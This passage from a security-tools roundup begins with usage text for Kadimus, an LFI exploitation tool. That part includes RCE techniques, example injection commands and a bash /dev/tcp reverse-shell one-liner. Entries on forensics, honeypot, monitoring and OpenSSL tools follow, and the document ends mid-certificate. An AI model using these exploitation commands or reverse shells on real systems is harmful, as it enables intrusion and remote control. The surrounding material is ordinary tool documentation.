    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --b-proxy STRING            IP/Hostname of socks5 proxy
    --b-port NUMBER             Port number of socks5 proxy

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

More information can be found at: https://github.com/P0cL4bs/Kadimus

Volatility – An Advanced Open Source Memory Forensics Framework


Quick Start

  • Choose a release – the most recent is Volatility 2.4, released August 2014. Older versions are also available on the Releases page or respective release pages. If you want the cutting edge development build, use a git client and clone the master.
  • Install the code – Volatility is packaged in several formats, including source code in zip or tar archive (all platforms), a Pyinstaller executable (Windows only) and a standalone executable (Windows only). For help deciding which format is best for your needs, and for installation or upgrade instructions, see Installation.
  • Target OS specific setup – the Linux, Mac, and Andoid support may require accessing symbols and building your own profiles before using Volatility. If you plan to analyze these operating systems, please see Linux, Mac, or Android.
  • Read usage and plugins – command-line parameters, options, and plugins may differ between releases. For the most recent information, see Volatility Usage and Command Reference.
  • Communicate – If you have documentation, patches, ideas, or bug reports, you can communicate them through the github interface, IRC (#volatility on freenode), the Volatility Mailing List or Twitter (@volatility).
  • Develop – For advanced users who want to develop their own plugins, address spaces, and other components of volatility, there is a recommended StyleGuide.

Why Volatility

  • A single, cohesive framework analyzes RAM dumps from 32- and 64-bit windows, linux, mac, and android systems. Volatility’s modular design allows it to easily support new operating systems and architectures as they are released. All your devices are targets…so don’t limit your forensic capabilities to just windows computers.

  • Its Open Source GPLv2, which means you can read it, learn from it, and extend it. Why use a tool that outputs results without giving you any indication where the values came from or how they were interpreted? Learn how your tools work, understand why and how to tweak and enhance them – help yourself become a smarter analyst. You can also immediately fix any issues you discover, instead of having to wait weeks or months for vendors to communicate, reproduce, and publish patches.
  • Its written in Python, an established forensic and reverse engineering language with loads of libraries that can easily integrate into volatility. Most analysts are already familiar with Python and don’t want to learn new languages. For example, windbg’s scripting syntax which is often seen as cryptic and many times the capabilities just aren’t there. Other memory analysis frameworks require you to use Visual Studio to compile C# DLLs and the rest don’t expose a programming API at all.
  • Runs on windows, linux, or mac analysis systems (anywhere Python runs) – a refreshing break from other memory analysis tools that only run on windows and require .NET installations and admin privileges just to open. If you’re already accustomed to performing forensics on a particular host OS, by all means keep using it – and take volatility with you.
  • Extensible and scriptable API gives you the power to go beyond and continue innovating. For example you can use volatility to build a customized web interface or GUI, drive your malware sandbox, perform virtual machine introspection or just explore kernel memory in an automated fashion. Analysts can add new address spaces, plugins, data structures, and overlays to truly weld the framework to their needs. You can explore the Doxygen documentation for Volatility to get an idea of its internals.
  • Unparalleled feature sets based on reverse engineering and specialized research. Volatility provides capabilities that Microsoft’s own kernel debugger doesn’t allow, such as carving command histories, console input/output buffers, USER objects (GUI memory), and network related data structures. Just because its not documented doesn’t mean you can’t analyze it!
  • Comprehensive coverage of file formats – volatility can analyze raw dumps, crash dumps, hibernation files, VMware .vmem, VMware saved state and suspended files (.vmss/.vmsn), VirtualBox core dumps, LiME (Linux Memory Extractor), expert witness (EWF), and direct physical memory over Firewire. You can even convert back and forth between these formats. In the heat of your incident response moment, don’t get caught looking like a fool when someone hands you a format your other tools can’t parse.
  • Fast and efficient algorithms let you analyze RAM dumps from large systems without unnecessary overhead or memory consumption. For example volatility is able to list kernel modules from an 80 GB system in just a few seconds. There is always room for improvement, and timing differs per command, however other memory analysis frameworks can take several hours to do the same thing on much smaller memory dumps.
  • Serious and powerful community of practitioners and researchers who work in the forensics, IR, and malware analysis fields. It brings together contributors from commercial companies, law enforcement, and academic institutions around the world. Don’t just take our word for it – check out the Volatility Documentation Project – a collection of over 200 docs from 60+ different authors. Volatility is also being built on by a number of large organizations such as Google, National DoD Laboratories, DC3, and many Antivirus and security shops.
  • Forensics/IR/malware focus – Volatility was designed by forensics, incident response, and malware experts to focus on the types of tasks these analysts typically form. As a result, there are things that are often very important to a forensics analysts that are not as important to a person debugging a kernel driver (unallocated storage, indirect artifacts, etc).
  • Money-back guarantee – although volatility is free, we stand by our work. There is nothing another memory analysis framework can do that volatility can’t (or that it can’t be quickly programmed to do).

More information can be found at the following websites: https://github.com/volatilityfoundation/volatility, https://github.com/volatilityfoundation/volatility/wiki and http://www.volatilityfoundation.org

Evolve – An Python Based Web Interface For Memory Forensics Framework Volatility



Web interface for the Volatility Memory Forensics Framework https://github.com/volatilityfoundation/volatility

Current Version: 1.2 (2015-05-07)

Short video demo: https://youtu.be/55G2oGPQHF8 Pre-Scan video: https://youtu.be/mqMuQQowqMI

Installation

This requires volatility to be a library, not just an EXE file sitting somewhere. Run these commands at python shell:

Download Volatility source zip from https://github.com/volatilityfoundation/volatility
Inside the extracted folder run:
setup.py install

Then install these dependencies:
pip install bottle
pip install yara
pip install distorm3

  • Note: you may need to prefix sudo on the above commands depending on your OS.
  • Note: You may also need to prefix python if it is not in your run path.
  • Note: Windows may require distorm3 download: https://pypi.python.org/pypi/distorm3/3.3.0

Usage

-f File containing the RAM dump to analyze
-p Volatility profile to use during analysis
-d Optional path for output file. Default is beside memory image
-r comma separated list of plugins to run at the start

!!! WARNING: Avoid writing sqlite to NFS shares. They can lock or get corrupt. If you must, try mounting share with ‘nolock’ option.

Features

  • Works with any Volatility module that provides a SQLite render method (some don’t)
  • Automatically detects plugins – If volatility sees the plugin, so will eVOLve
  • All results stored in a single SQLite db stored beside the RAM dump
  • Web interface is fully AJAX using jQuery & JSON to pass requests and responses
  • Uses Bottle module in Python to provide a standalone web server
  • Option to edit SQL query to provide enhanced data views with data from multiple tables
  • Run plugins and view data from any browser – even a tablet!
  • Allow multiple people to review results of single RAM dump
  • Multiprocessing for full CPU usage
  • Pre-Scan runs a list of plugins at the start

Coming Features

  • Save custom queries for future use
  • Import/Export queries to share with others
  • Threading for more responsive interface while modules are running
  • Export/save of table data to JSON, CSV, etc
  • Review mode which requires only the generated SQLite file for better portability

Please send your ideas for features!

Release notes:
v1.0 – Initial release
v1.1 – Threading, Output folder option, removed unused imports
v1.2 – Pre-Scan option to run list of plugins at the start


More information can be found at: https://github.com/JamesHabben/evolve

Dockerpot – A Docker Based Honeypot


Dockerpot is docker based honeypot.

Installation

Install the necessary software

$ sudo apt-get update
$ sudo apt-get install docker.io socat xinetd auditd

$ # for installing nsenter
$ docker run --rm -v /usr/local/bin:/target jpetazzo/nsenter

Install the honeypot scripts

Copy honeypot to /usr/bin/honeypot and honeypot.clean to /usr/bin/honeypot.clean and make them executable. You may have to customize the ports in the iptables rules, the memory limit of the container and the network quota if you want to run anything other than an SSH honeypot on port 22.

Configure crond, xinetd and auditd

crond

Add the following line to /etc/crontab. This runs the cleanup script to check for old containers every 5 minutes.

*/5 * * * * /usr/honeypot/honeypot.clean

xinetd

Create the following service file in /etc/xinetd.d/honeypot and add the line honeypot 22/tcp to /etc/services to keep xinetd happy.

# Container launcher for an SSH honeypot
service honeypot
{
        disable         = no
        instances       = UNLIMITED
        server          = /usr/bin/honeypot
        socket_type     = stream
        protocol        = tcp
        port            = 22
        user            = root
        wait            = no
        log_type        = SYSLOG authpriv info
        log_on_success  = HOST PID
        log_on_failure  = HOST
}

auditd

Enable logging the execve systemcall in auditd by appending the following lines to /etc/audit/audit.rules.

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

Create a base image for the honeypot

Create and configure a base image for the honeypot. The container will be run using the command /sbin/init so place your initialization script there or configure an init system of your choice. Make sure to commit the image as “honeypot:latest”. You should also create an account named user and give it a weak password like 123456 to let brute-force attackers crack your host. The ip address of the attacker’s host is passed to the container in the environment variable “REMOTE_HOST”. For logging you might want to additionally configure an rsyslog instance to forward logs to the host machine at 172.17.42.1.


More information about this project can be found at: http://www.itinsight.hu/blog/posts/2015-05-04-creating-honeypots-using-docker.html and at: https://github.com/mrschyte/dockerpot

Postscreen-Stats – A simple script to parse Postscreen logs


Postscreen Statistics Parser

Simple script to compute some statistics on Postfix/Postscreen Activity Run it against your postfix syslogs

Published under GPL v2

Usage


postscreen_stats.py
    parses postfix logs to compute statistics on postscreen activity

usage: postscreen_stats.py -f mail.log

  -a|--action=   action filter with operators | and &
                      ex. 'PREGREET&DNSBL|HANGUP' = ((PREGREET and DNSBL) or HANGUP)
                      ex. 'HANGUP&DNSBL|PREGREET&DNSBL' 
                          = ((HANGUP and DNSBL) or (PREGREET and DNSBL)

  -f|--file=     log file to parse (default to /var/log/maillog)

  -g            /!\ slow ! ip geoloc against hostip.info (default disabled)

  --geofile=    path to a maxmind geolitecity.dat. if specified, with the -g switch
                the script uses the maxmind data instead of hostip.info (faster)

  -G            when using --geofile, use the pygeoip module instead of the GeoIP module

  -i|--ip=      filters the results on a specific IP

  --mapdest=    path to a destination HTML file that will display a Google Map of the result
                  /!\ Require the geolocation, preferably with --geofile

  --map-min-conn=   When creating a map, only map the IPs that have connected X number of times

  -r|--report=  report mode {short|full|ip|none} (default to short)

  -y|--year=    select the year of the logs (default to current year)

  --rfc3339     to set the timestamp type to "2012-04-13T08:53:00+02:00" instead of the regular syslog format "Oct 23 04:02:17"

example: $ ./postscreen_stats.py -f maillog.3 -r short -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Julien Vehent (http://1nw.eu/!j) - https://github.com/jvehent/Postscreen-Stats

Basic usage

Generate a report form a syslog postfix log file. If you are parsing logs from a year that is not the current year, use the -y option to specify the year of the logs.

$ python postscreen_stats.py -f maillog.1 -r short -y 2011
=== unique clients/total postscreen actions ===
2131/11010 CONNECT
1/1 BARE NEWLINE
30/33 COMMAND COUNT LIMIT
13/16 COMMAND PIPELINING
6/6 COMMAND TIME LIMIT
463/536 DNSBL
305/503 HANGUP
12/15 NON-SMTP COMMAND
1884/2258 NOQUEUE 450 deep protocol test reconnection
1/42 NOQUEUE too many connections
1577/1600 PASS NEW
866/8391 PASS OLD
181/239 PREGREET
5/84 WHITELISTED

=== clients statistics ===
4 avg. dnsbl rank
505 blocked clients
2131 clients
840 reconnections
32245.4285714 seconds avg. reco. delay

=== First reconnection delay (graylist) ===
delay| <10s   |>10to30s| >30to1m| >1to5m | >5to30m|>30mto2h| >2hto5h|>5hto12h|>12to24h| >24h   |
count|12      |21      |21      |196     |261     |88      |40      |29      |53      |119     |
   % |1.4     |2.5     |2.5     |23      |31      |10      |4.8     |3.5     |6.3     |14      |

Get the statistics for a specific IP only

$ python postscreen_stats.py -f maillog.1 -r ip -i 1.2.3.4
Filtering results to match: 1.2.3.4
1.2.3.4
    connections count: 2
    first seen on 2011-10-22 09:37:54
    last seen on 2011-10-22 09:38:00
    DNSBL count: 1
    DNSBL ranks: ['6']
    HANGUP count: 2

Geo Localisation of blocked IPs

There are 3 GeoIP modes:

  1. Use hostip.info online geoip service. This is free but slow and not very accurate
  2. Use Maxmind’s GeoIP database. You can use either the free version of the DB from their website, or get a paid version.

To use hostip.info, just set the -g option. To use maxmind, set the --geofile to point to your Maxmind DB (ie. --geofile=/path/to/GeoIPCity.dat) By default, geofile use the GeoIP python module, but if you prefer to use pygeoip instead, set the -G option as well.

$ ./postscreen_stats.py -r short --geofile=../geoip/GeoIPCity.dat -G -f maillog.3 -y 2011

[….]

=== Top 20 Countries of Blocked Clients ===
 167 (33.00%) United States
  59 (12.00%) India
  33 ( 6.50%) Russian Federation
  26 ( 5.10%) Indonesia
  23 ( 4.60%) Pakistan
  21 ( 4.20%) Vietnam
  20 ( 4.00%) China
  13 ( 2.60%) Brazil
  11 ( 2.20%) Korea, Republic of
   9 ( 1.80%) Belarus
   8 ( 1.60%) Turkey
   7 ( 1.40%) Iran, Islamic Republic of
   7 ( 1.40%) Ukraine
   6 ( 1.20%) Kazakstan
   6 ( 1.20%) Chile
   5 ( 0.99%) Italy
   5 ( 0.99%) Romania
   4 ( 0.79%) Poland
   4 ( 0.79%) Spain
   3 ( 0.59%) Afghanistan

Geo IP database installation

Using the MaxMind free database at http://www.maxmind.com/app/geolitecity 1. Download the database and extract GeoLiteCity.dat at the location of your choice 2. install the GeoIP maxmind package # aptitude install python-geoip 3. launch postscreen_stats with --geofile="/path/to/geolistcity.dat"

Google Map of the blocked IPs

You can use the --mapdest option to create an HTML file with a map of the blocked IPs.

$ ./postscreen_stats.py -f maillog.3 -r none -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Google map will be generated at postscreen_report_2012-01-15.html
using MaxMind GeoIP database from ../geoip/GeoIPCity.dat
Creating HTML map at postscreen_report_2012-01-15.html

If you have a lot of IPs to map, you can use --map-min-conn to only map IPs that connected X+ number of times.

./postscreen_stats.py -f maillog.3 -y 2011 -g --geofile=../geoip/GeoIPCity.dat -G --mapdest=testmap.html --map-min-conn=5


More information can be found on: https://github.com/jvehent/Postscreen-Stats

DetectIndent – Vim script for automatically detecting indent settings


A Vim plugin, for automatically detecting indent settings. This plugin adds a :DetectIndent command, which tries to intelligently set the ‘shiftwidth’, ‘expandtab’ and ‘tabstop’ options based upon the existing settings in use in the active file.

You may wish to consider one of the many forks of this project. Be aware that some of these forks have merged patches that I have been ignoring for good reasons, and that long lists of special cases are not necessarily a good idea…


More information can be found on: https://github.com/ciaranm/detectindent

PGP Finder – Find PGP keys on keyservers and show the details of each key


PGP Finder

A simple, not so smart, client to search key servers and print the details of found keys. It’s more of a proof of concept for the openpgp Go module than anything else. And I don’t intend to make it particularly useful…

$ go run pgpfinder.go -search jvehent -v

searching at http://gpg.mozilla.org:80/pks/lookup?op=vindex&options=mr&search=jvehent
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x4FB5544F
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x3B763E8F
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x3556EF3A
found 3 keys on http://gpg.mozilla.org:80 for jvehent

========       Details of Key ID 65BE0EFC4FB5544F       ========
Fingerprint: 6F7071509123FDABD85A43EA65BE0EFC4FB5544F
Creation Time: 2014-01-28 12:23:02 -0500 EST
Pubkey algorithm: RSA
Public Modulus: 2048 bits. Public exponent: 65537
Identities:
- Julien Vehent Mozilla Investigator (Mozilla Investigator Signing Key for Julien Vehent. Contact opsec@mozilla.com) <jvehent+mig@mozilla.com>
    signatures:

================================================================

========       Details of Key ID A3D652173B763E8F       ========
Fingerprint: E60892BB9BD89A69F759A1A0A3D652173B763E8F
Creation Time: 2013-04-30 12:05:37 -0400 EDT
Pubkey algorithm: RSA
Public Modulus: 2048 bits. Public exponent: 65537
Identities:
- Julien Vehent (ulfr) <jvehent@mozilla.com>
    signatures:
    - 5FEE05E6A56E15A3 2013-10-04 12:37:25 -0400 EDT
    - 13CE04062983AB4B 2013-10-11 19:51:43 -0400 EDT
    - FDBE31EE3033CB4E 2014-03-25 17:12:53 -0400 EDT
    - C7578A5395612E47 2014-03-18 13:39:33 -0400 EDT
    - 25ADBFC5B42BC501 2014-03-25 17:09:51 -0400 EDT
    - F0A9E7DCD39E452E 2014-03-18 13:44:55 -0400 EDT
    - B7207AAB28A860CE 2013-10-04 12:24:10 -0400 EDT
    - F2ECB29133DB65A0 2013-05-08 16:10:52 -0400 EDT
    - 87DF65059EF093D3 2014-03-18 13:40:21 -0400 EDT
    - A4AB57D80525636A 2014-03-18 13:41:04 -0400 EDT
    - EC36FEE86B8579BF 2014-03-18 13:41:21 -0400 EDT
    - 39DC218DC20B410B 2014-03-18 13:43:25 -0400 EDT
    - 5CDBCABCB7116A0 2014-03-18 13:49:32 -0400 EDT
    - 7813901286EDAAC4 2014-03-18 13:51:32 -0400 EDT
    - 72E07B272580198E 2014-03-18 14:39:27 -0400 EDT
    - 3342E1B667A38863 2014-03-25 17:11:45 -0400 EDT
    - EAD831C6F616AB35 2013-10-04 13:12:02 -0400 EDT
    - B573F0908DA0D143 2013-05-08 15:47:38 -0400 EDT
    - 9F96B92930380381 2013-10-08 06:53:54 -0400 EDT
    - 80D30F5A3D16045C 2014-03-25 17:29:34 -0400 EDT
    - BC17301B491B3F21 2013-05-07 13:48:47 -0400 EDT
    - D9B347EA9DF43DBB 2013-10-08 09:05:45 -0400 EDT
    - 825E72461A1B8499 2013-10-10 17:42:44 -0400 EDT
    - 8262833620A64C3F 2013-10-04 12:31:31 -0400 EDT
    - 100C9B89DF55A146 2014-03-25 17:09:47 -0400 EDT
    - BD897970048474F9 2014-03-25 17:14:18 -0400 EDT
    - 23BAD351C916B67D 2013-10-04 13:22:52 -0400 EDT
- Julien Vehent (personal) <julien@linuxwall.info>
    signatures:
    - FDBE31EE3033CB4E 2014-03-25 17:12:38 -0400 EDT
    - 25ADBFC5B42BC501 2014-03-25 17:09:37 -0400 EDT
    - F0A9E7DCD39E452E 2014-03-18 13:44:55 -0400 EDT
    - B7207AAB28A860CE 2013-10-04 12:24:10 -0400 EDT
    - EC36FEE86B8579BF 2014-03-18 13:41:21 -0400 EDT
    - 39DC218DC20B410B 2014-03-18 13:43:25 -0400 EDT
    - 5CDBCABCB7116A0 2014-03-18 13:49:32 -0400 EDT
    - 72E07B272580198E 2014-03-18 14:39:24 -0400 EDT
    - F2ECB29133DB65A0 2014-03-25 17:12:16 -0400 EDT
    - 3342E1B667A38863 2014-03-25 17:11:39 -0400 EDT
    - EAD831C6F616AB35 2013-10-04 13:12:02 -0400 EDT
    - 80D30F5A3D16045C 2014-03-25 17:29:34 -0400 EDT
    - 100C9B89DF55A146 2014-03-25 17:09:46 -0400 EDT
    - BD897970048474F9 2014-03-25 17:14:14 -0400 EDT

================================================================

========       Details of Key ID C0826E8B3556EF3A       ========
Fingerprint: 340A3801993728D8C15CA46AC0826E8B3556EF3A
Creation Time: 2005-03-04 06:39:55 -0500 EST
Pubkey algorithm: RSA
Public Modulus: 1024 bits. Public exponent: 41
Identities:
- VEHENT Julien <jvehent@free.fr>
    signatures:
    - C0826E8B3556EF3A 2005-03-04 06:43:21 -0500 EST

================================================================


More information can be found on: https://github.com/jvehent/pgpfinder


Ray-Mon – PHP and Bash server status monitoring


Ray-Mon is a linux server monitoring script written in PHP and Bash, utilizing JSON as data storage. It requires only bash and a webserver on the client side, and only php on the server side. The client currently supports monitoring processes, uptime, updates, amount of users logged in, disk usage, RAM usage and network traffic.

Features

  • Ping monitor
  • History per host
  • Threshold per monitored item.
  • Monitors:
    • Processes (lighttpd, apache, nginx, sshd, munin etc.)
    • RAM
    • Disk
    • Uptime
    • Users logged on
    • Updates
    • Network (RX/TX)

Download

Either git clone the github repo:

git clone git://github.com/RaymiiOrg/raymon.git

Or download the zipfile from github:

https://github.com/RaymiiOrg/raymon/zipball/master

Or download the zipfile from Raymii.org

https://raymii.org/s/inc/software/raymon-0.0.2.zip

This is the github page: https://github.com/RaymiiOrg/raymon/

Changelog

v0.0.2
  • Server side now only requires 1 script instead of 2.
  • Client script creates the json better, if a value is missing the json file doesn’t break.
  • Changed the visual style to a better layout.
  • Thresholds implemented and configurable.
  • History per host now implemented.
v0.0.1
  • Initial release

Install

Client

The client.sh script is a bash script which outputs JSON. It requires root access and should be run as root. It also requires a webserver, so that the server can get the json file.

Software needed for the script:

  • bash
  • awk
  • grep
  • ifconfig
  • package managers supported: apt-get, yum and pacman (debian/ubuntu, centos/RHEL/SL, Arch)

Setup a webserver (lighttpd, apache, boa, thttpd, nginx) for the script output. If there is already a webserver running on the server you dont need to install another one.

Edit the script:

Network interfaces. First one is used for the IP, the second one is used for bandwidth calculations. This is done because openVZ has the “venet0” interface for the bandwidth, and the venet0:0 interface with an IP. If you run bare-metal or KVM or vserver etc. you can set these two to the same value (eth0 eth1 etc).

# Network interface for the IP address
iface="venet0:0"
# network interface for traffic monitoring (RX/TX bytes)
iface2="venet0"

The IP address of the server, this is used by me when deploying this script via chef or ansible. You can set it, but it is not required.

Services are checked by doing a ps to see if the process is running. The last service should be defined without a comma, for valid JSON. The code below monitors “sshd”, “lighttpd”, “munin-node” and “syslog”.

SERVICE=lighttpd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
SERVICE=sshd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
SERVICE=syslog
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
#LAST SERVICE HAS TO BE WITHOUT , FOR VALID JSON!!!
SERVICE=munin-node
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running""; else echo -n ""$SERVICE" : "not running""; fi

To add a service, copy the 2 lines and replace the SERVICE=processname with the actual process name:

SERVICE=processname
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi

And, make sure the last service montiored does not echo a comma at the end, else the JSON is not valid and the php script fails.

Now setup a cronjob to execute the script on a set interval and save the JSON to the webserver directory.

As root, create the file /etc/cron.d/raymon-client with the following contents:

SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root /root/scripts/client.sh | sed ':a;N;$!ba;s/n//g' > /var/www/stat.json

In my case, the client script is in /root/scripts, and my webserver directory is /var/www. Change this to your own setup. Also, you might want to change the time interval. /5 executes every 5 minutes. The sed line is in there to remove the newlines, this creates a shorter JSOn file, saves some KB’s. The *root after the cron time is special for a file in /etc/cron.d/, it tells cron as which user it has to execute the crontab file.

When this is setup you should get a stat.json file in the /var/www/ folder containing the status json. If so, the client is setup correctly.

Server

The status server is a php script which fetches the json files from the clients every 5 minutes, saves them and shows them. It also saves the history, but that is defined below.

Requirements:

  • Webserver with PHP (min. 5.2) and write access to the folder the script is located.

Steps:

Create a new folder on the webserver and make sure the webserver user (www-data) can write to it.

Place the php file “stat.php” in that folder.

Edit the host list in the php file to include your clients:

The first parameter is the filename the json file is saved to, and the second is the URL where the json file is located.

$hostlist=array(
                'example1.org.json' => 'http://example1.org/stat.json',
                'example2.nl.json' => 'http://example2.nl/stat.json',
                'special1.network.json' => 'http://special1.network.eu:8080/stat.json',
                'special2.network.json' => 'https://special2.network.eu/stat.json'
                );

Edit the values for the ping monitor:

$pinglist = array(
                  'github.com',
                  'google.nl',
                  'tweakers.net',
                  'jupiterbroadcasting.com',
                  'lowendtalk.com',
                  'lowendbox.com' 
                  );

Edit the threshold values:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";
#the below values set the threshold before a value gets shown in bold on the page.
# Max updates available
$maxupdates = "10";
# Max users concurrently logged in
$maxusers = "3";
# Max load.
$maxload = "2";
# Max disk usage (in percent)
$maxdisk = "75";
# Max RAM usage (in percent)
$maxram = "75";
History

To save the history you have to setup a cronjob to get the status page with a special “history key”. You define this in the stat.php file:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";    

And then the cronjob to get it:

## This saves the history every 8 hours. 
30 */8 * * * wget -qO /dev/null http://url-to-status.site/status/stat.php?action=save&&key=8A29691737D

The cronjob can be on any server which can access the status page, but preferably on the host where the status page is located.

OpenSSL: Manually verify a certificate against a CRL


This article shows you how to manually verfify a certificate against a CRL. CRL stands for Certificate Revocation List and is one way to validate a certificate status. It is an alternative to the OCSP, Online Certificate Status Protocol.

You can read more about CRL’s on Wikipedia.

We will be using OpenSSL in this article. I’m using the following version:

$ openssl version
OpenSSL 1.0.2 22 Jan 2015

Get a certificate with a CRL

First we will need a certificate from a website. I’ll be using Wikipedia as an example here. We can retreive this with the following openssl command:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p'

Save this output to a file, for example, wikipedia.pem:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > wikipedia.pem

Now, check if this certificate has an CRL URI:

openssl x509 -noout -text -in wikipedia.pem | grep -A 4 'X509v3 CRL Distribution Points'
X509v3 CRL Distribution Points: 
    Full Name:
      URI:http://crl.globalsign.com/gs/gsorganizationvalsha2g2.crl

If it does not give any output, the certificate has no CRL URI. You cannot valdiate it against a CRL.

Download the CRL:

wget -O crl.der http://crl.globalsign.com/gs/gsorganizationvalsha2g2.crl

The CRL will be in DER (binary) format. The OpenSSL command needs it in PEM (base64 encoded DER) format, so convert it:

openssl crl -inform DER -in crl.der -outform PEM -out crl.pem

Getting the certificate chain

It is required to have the certificate chain together with the certificate you want to validate. So, we need to get the certificate chain for our domain, wikipedia.org. Using the -showcerts option with openssl s_client, we can see all the certificates, including the chain:

openssl s_client -connect wikipedia.org:443 -showcerts 2>&1 < /dev/null

Results in a lot of output, but what we are interested in is the following:

 1 s:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3
   i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA
-----BEGIN CERTIFICATE-----
MIIGWDCCBUCgAwIBAgIQCl8RTQNbF5EX0u/UA4w/OzANBgkqhkiG9w0BAQUFADBs
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j
ZSBFViBSb290IENBMB4XDTA4MDQwMjEyMDAwMFoXDTIyMDQwMzAwMDAwMFowZjEL
MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3
LmRpZ2ljZXJ0LmNvbTElMCMGA1UEAxMcRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug
Q0EtMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9hCikQH17+NDdR
CPge+yLtYb4LDXBMUGMmdRW5QYiXtvCgFbsIYOBC6AUpEIc2iihlqO8xB3RtNpcv
KEZmBMcqeSZ6mdWOw21PoF6tvD2Rwll7XjZswFPPAAgyPhBkWBATaccM7pxCUQD5
BUTuJM56H+2MEb0SqPMV9Bx6MWkBG6fmXcCabH4JnudSREoQOiPkm7YDr6ictFuf
1EutkozOtREqqjcYjbTCuNhcBoz4/yO9NV7UfD5+gw6RlgWYw7If48hl66l7XaAs
zPw82W3tzPpLQ4zJ1LilYRyyQLYoEt+5+F/+07LJ7z20Hkt8HEyZNp496+ynaF4d
32duXvsCAwEAAaOCAvowggL2MA4GA1UdDwEB/wQEAwIBhjCCAcYGA1UdIASCAb0w
ggG5MIIBtQYLYIZIAYb9bAEDAAIwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3
LmRpZ2ljZXJ0LmNvbS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUH
AgIwggFWHoIBUgBBAG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQBy
AHQAaQBmAGkAYwBhAHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBj
AGUAcAB0AGEAbgBjAGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAg
AEMAUAAvAEMAUABTACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQ
AGEAcgB0AHkAIABBAGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBt
AGkAdAAgAGwAaQBhAGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBj
AG8AcgBwAG8AcgBhAHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBl
AHIAZQBuAGMAZQAuMBIGA1UdEwEB/wQIMAYBAf8CAQAwNAYIKwYBBQUHAQEEKDAm
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wgY8GA1UdHwSB
hzCBhDBAoD6gPIY6aHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGln
aEFzc3VyYW5jZUVWUm9vdENBLmNybDBAoD6gPIY6aHR0cDovL2NybDQuZGlnaWNl
